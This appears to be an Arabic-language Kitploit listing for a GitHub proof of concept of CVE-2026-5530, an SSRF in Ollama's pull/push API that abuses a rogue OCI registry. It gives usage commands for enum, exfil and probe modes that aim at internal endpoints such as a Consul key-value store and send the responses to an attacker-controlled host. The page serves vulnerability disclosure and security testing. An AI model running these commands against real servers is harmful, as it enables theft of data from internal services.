Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5530 — إثبات مفهوم لاستغلال CVE-2026-5530، وهو ثغرة SSRF في واجهة برمجة تطبيقات Pull/Push الخاصة بـ Ollama، مما يتيح تعداد نقاط النهاية الداخلية واستخراج الاستجابات الكاملة عبر سجل OCI خادع. | Kitploit
أدوات/GitHubGitHub/davidrxchester/cve-2026-5530
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلومات
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

إثبات مفهوم لاستغلال CVE-2026-5530، وهو ثغرة SSRF في واجهة برمجة تطبيقات Pull/Push الخاصة بـ Ollama، مما يتيح تعداد نقاط النهاية الداخلية واستخراج الاستجابات الكاملة عبر سجل OCI خادع.

عرض المستودع
7منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-5530

ثغرة SSRF في Ollama عبر إعادة توجيه سجل OCI مع استخراج كامل للاستجابة.

التقرير الفني: https://davidrochester.com/posts/cve-2026-5530

الإفصاح

تم التواصل مع Ollama عدة مرات دون أي رد.

الاستخدام

ثلاثة أوضاع: enum (الاستكشاف)، exfil (الاستخراج)، و probe (الاستطلاع).

Enum (الاستكشاف)

يكتشف نقاط النهاية الداخلية الحية التي يمكن الوصول إليها من مضيف Ollama.

root@kitploit:~
python3 poc.py targets.txt --registry-host <your-ip>

Exfil (الاستخراج)

يستخرج استجابات SSRF عندما تعرف حجم الاستجابة.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>

Probe (الاستطلاع)

يبحث ثنائيًا عن حجم الاستجابة تلقائيًا، ثم يستخرجها.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>

الخيارات

root@kitploit:~
target              عنوان URL أو ملف عناوين URL (عنوان واحد لكل سطر، # للتعليقات)
-p, --port          منفذ السجل المارق (الافتراضي: 9999)
--exfil-port        منفذ سجل الاستخراج (الافتراضي: 10000)
--exfil             وضع الاستخراج، يتطلب --size
--probe             بحث ثنائي عن الحجم، ثم استخراج
--size              Content-Length (مطلوب مع --exfil)
--registry-host     عنوان IP/اسم المضيف الخاص بالمهاجم الذي يمكن لـ Ollama الوصول إليه
--ollama            عنوان Ollama API (الافتراضي: http://127.0.0.1:11434)
تنزيل الأداة